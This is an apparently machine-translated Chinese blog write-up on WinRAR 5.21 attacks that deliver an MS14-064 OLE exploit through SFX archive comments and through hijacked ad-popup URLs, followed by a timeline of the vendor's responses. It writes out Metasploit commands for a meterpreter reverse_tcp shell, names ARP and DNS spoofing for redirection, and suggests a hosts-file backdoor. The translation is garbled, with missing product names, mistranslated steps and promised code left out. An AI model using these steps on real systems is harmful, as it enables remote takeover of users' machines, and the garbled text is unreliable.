winrar弹出广告 0x00 前言
0x00 前言
上月底,5.21中曝光了一个代码执行漏洞。 实验室将该漏洞评为高风险,风险系数为 9(满分 10)。 与此同时,安全研究人员Reza发布了一个PoC,可以在用户打开SFX文件时实现隐蔽执行。 攻击代码,但官方认为该功能是软件安装所必需的,无需发布任何修复补丁或升级。
我以为我可以跳过这个漏洞,但经过进一步研究,我发现了一些更有趣的东西。
0x01 5.21 – SFX OLE 代码执行漏洞
5.21-SFX OLE代码执行漏洞简介
1.相关概念
SFX:SelF-的缩写,中文翻译自解压文件,是一种无需安装压缩软件即可解压的压缩文件。
MS14-064:OLE远程代码执行漏洞影响Win95+IE3 – Win10+IE11的所有版本。 实际使用中,在win7以上系统上,由于IE的沙箱机制,启动白名单外的进程时会弹出提示,如图
2. 脆弱性原理
sfx文件支持在创建时添加html脚本,但不会受到IE沙箱的限制。 如果主机存在MS14-064漏洞,打开包含MS14-064 exp的sfx文件后,可以隐蔽执行任意代码。
3、测试环境
win7 x86
存在MS14-064漏洞
安装WinRar 5.21
4、测试流程
实现比较简单,所以只简单介绍一下。
(1) 构建
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.40.131
set LPORT 1234
exploit
如图所示
(2) 生成音效
选择一个文件右键并添加到压缩文件
选中Create SFX archive
点击Advanced
点击SFX options
点击Text and icon
在 Text to in SFX 中输入以下代码:
(3)运行sfx文件
双击即可上网
5.分析这种在sfx文件中添加html代码的方法很早以前就出现过,比如早在2008年就存在的挂马相关链接:这个漏洞的亮点在于它允许MS14-064漏洞利用逃脱IE沙箱的限制如何查明是否含有SFX OLE代码执行漏洞:遇到后缀为.exe的压缩文件,右键-属性-注释,查看内容如图
0x02 poc之谜
Lab等各大网站夸大漏洞危害性是很有趣的事情,而POC作者的所有权又导致了更有趣的事情。
接下来根据收集到的信息整理出以下时间节点:
1. 5.21代码执行漏洞曝光
文章中披露了 Reza 的 poc
日期:2015年9月28日
相关链接:
2、第一时间官方回应
限制SFX模块中的HTML功能会影响用户的正常使用,攻击者仍然可以使用旧版本的SFX模块、来自非UnRAR源代码的自定义模块或自建的代码压缩包来进行攻击。 因此,我们拒绝为此提供补丁,并再次提醒用户。 ,无论任何文件,您都应该确认其来源是否可信
相关链接:
3. 做出第二次回应
指出这个漏洞是夸大其词是毫无意义的。 建议用户多关注系统的安全性而不是软件本身。 最后提到R-73eN()举报Reza抄袭其POC代码。
相关链接:
4. 0day.today 可能被证明抄袭。
(1) R-73eN 第一个 POC
日期:2015年9月25日
相关链接:
(2)Reza后来发布了POC
日期:2015年9月26日
相关链接:
5、R-73eN公布第二个漏洞(过期通知)以证明其实力。 OLE远程代码执行漏洞poc
日期:2015年9月30日
相关链接:
6、回应R-73eN公布的第二个漏洞,拒绝修复
-试用版WinRaR会弹出提示注册的窗口,该漏洞被利用存在可能
-利用条件:
网络被劫持
未安装MS14-064漏洞补丁
-但是又指出如果满足利用条件,那么系统本身已经不安全,早已超出WinRaR软件自身范畴
-因此拒绝为此漏洞更新补丁
相关链接:
0x03 –(过期通知和广告)OLE 远程代码执行漏洞
虽然(过期通知)OLE远程代码执行漏洞也被忽略了,但这个想法很有趣。 当然,R-73eN发布的POC还需要进行部分修改,以适应更多的环境。
1.相关知识
我们在使用的时候经常会遇到以下几种情况:
打开WinRAR时会弹出广告,提示用户付费去掉广告,而不同版本WinRaR广告的链接会存在差异
英文版目前最新为5.30 beta5
中文版目前最新为5.21
英文版广告链接:http://www.win-rar.com/notifier/
中文版广告链接:http://www.winrar.com.cn/ad/***
2. 脆弱性原理
默认情况下,将访问特定的 URL。 如果能够劫持并替换为MS14-064攻击代码,就可以轻松远程执行任意代码。 当然,它也可以逃脱IE沙箱的限制。
3、测试环境
win7 x86
存在MS14-064漏洞
安装WinRar 5.21 cn
4、测试流程
(1)构建并下载POC,相关链接:
poc需要稍作修改(这里暂未提供修改方法),执行脚本,如图
注:如果你了解MS14-064漏洞的原理,这里修改起来很容易。
(2) 重定向到ip
可以使用arp欺骗和dns欺骗
(3) 使用以下命令打开任意文件
默认弹出广告,触发漏洞,弹出计算器,如图
5.分析虽然这个漏洞出现的条件比较有限,但是这个思路很有启发性。 您可以尝试使用其他软件默认弹出网页。 可以通过修改host文件来永久改变广告链接,最终实现另一种后门启动方式。 该漏洞防范:0x04 摘要
漏洞相对较少,但如果与其他攻击方式结合,是否能够突破其官方宣称的安全逻辑,值得继续研究。
本文由三好同学原创,首发于五云滴。 转载时请注明。